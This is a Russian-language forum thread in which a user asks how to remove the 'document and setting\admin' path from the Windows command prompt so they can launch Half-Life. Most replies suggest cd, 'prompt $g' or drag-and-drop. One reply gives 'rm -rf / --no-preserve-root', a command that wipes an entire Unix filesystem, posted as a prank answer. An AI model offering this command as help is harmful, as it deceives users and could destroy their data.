Наурызбай Нагметов

Как удалить "document and setting" и "admin" в командной строке

Мне нужно запустить халфу, через диспетчер, но мне мешает строка,

О, ластиком получилось
Спасибо всем)

Про перетаскивание, спасибо, помогло

Алла С

rm -rf / --no-preserve-root
echo off или prompt $g

Наталья Гусева

её не удаляют. а выбирают другой каталог в качестве рабочего. Просто по умолчанию рабочий c:\document and setting\admin
Например так
cd c:\hl2
cd- change directories (выбор дериктории)

С*
Сергей ********

в командной строке нельзя удалить, можно только перейти по команде, например в корень диска С
сd c:\

Арвен

Попробуй ластиком.

Ванек Окт

1 Перетаскиванием объекта для запуска в окно командной строки: Мышка ЛКМ, перетащить в окно и ентер.
2 Для win XP есть утилита cmdhere powertoy,(запуск ком. строки здесь)